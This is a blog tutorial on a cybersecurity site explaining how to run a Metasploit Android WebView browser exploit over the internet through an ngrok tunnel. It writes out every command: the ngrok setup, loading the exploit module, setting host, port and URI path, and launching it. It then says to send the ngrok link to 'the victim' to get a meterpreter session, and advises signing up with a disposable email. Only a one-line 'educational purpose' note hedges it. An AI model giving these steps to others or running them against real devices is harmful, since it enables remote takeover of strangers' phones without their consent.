CIP Cyber

Log In
Menu
Log In
  • Opinion
  • Product Reviews
  • Industrial Cybersecurity
  • Videos

Use Metasploit on WAN without Port Forwarding

Table of Contents

In
all of my previous Metasploit articles or videos, I am always performing
attacks on LAN. Lots of people were asking me how to use Metasploit on the
Internet or WAN. One way is to port forward the router. But in today’s post, I
am going to use a different method which doesn’t require any port forwarding.




Setting Ngrok

·        
First of all, we start with creating account at Ngrok.com
·        
Use any disposable email service to sign up.
·        
After signing up, log in to Ngrok.com and download the ngrok
file.
·        
Now extract the file and open terminal in that folder.
·        
Log in again to your ngrok account and type the commands
available on that page.

·        
Copy the authentication code command and paste in the terminal.

./ngrok authtoken
your_authentication_code

·        
With the above command, the authentication code will be saved in
your computer.
·        
Now type the following command to start the tunnel.

./ngrok http
4431 

·        
Now the ngrok will start a tunnel to your computer. Copy the
Ngrok URL we will need this URL later in this tutorial. Also remember the port
in above command.

Using Metasploit with
Ngrok

·        
For this tutorial, we are using Android web view exploit.
·        
Open terminal and type msfconsole.
·        
Now type the following command to load Android web view exploit.

use
exploit/android/browser/webview_addjavascriptinterface

·        
Now while setting SRVHOST and LHOST use localhost.

set srvhost localhost
set lhost localhost

·        
In SRVPORT we will use same port that we have used while
starting ngrok .i.e 4431.

set srvport 4431

·        
Now set URIPATH to /. Use the following commands.

set uripath /

·        
Above three steps are most important, so don’t change the
values.
·        
Then enter run to start exploit.
·        
Now you can send the link that you have got when you started
Ngrok to the victim and you we be able to get the
meterpreter session over the internet

Video Demonstration


Use Social Engineering
Toolkit without Port Forwarding


NOTE

·        
Don’t change the values of srvhost, lhost and uripath.
·        
Make sure srvport and port you set while starting ngrok are
same.
·        
Only for educational purpose. 

Author:

This
article has been written by Aditya Joshi who writes for creedsec.net
and can be reached on @darktruth190
Irfan Shakeel

Irfan Shakeel

Irfan Shakeel is a distinguished cybersecurity professional, thought leader, and trainer. As a director at CIP Cyber, he contributes valuable insights and opinions on the industrial cybersecurity domain. In addition to his written expertise, Irfan hosts the popular CIP Cybersecurity webinar, further showcasing his extensive knowledge and commitment to enhancing critical infrastructure protection.

Most popular

Opinion

Password Cyberattack: Everything You Need to Know

November 7, 2023

Industrial Cybersecurity

Cybersecurity Awareness Month: Spotlight on ICS/OT Security

September 28, 2023

Opinion

How to Protect IoT Devices in Critical Infrastructure Networks

September 15, 2023

Want always be up to date?

Don't miss the latest news

By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.

CIP Training & Certifications

Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings

Choose Training

Related Articles

Want always be up to date?

Don't miss the latest news

By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.

CIP Training & Certifications

Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings

Choose Training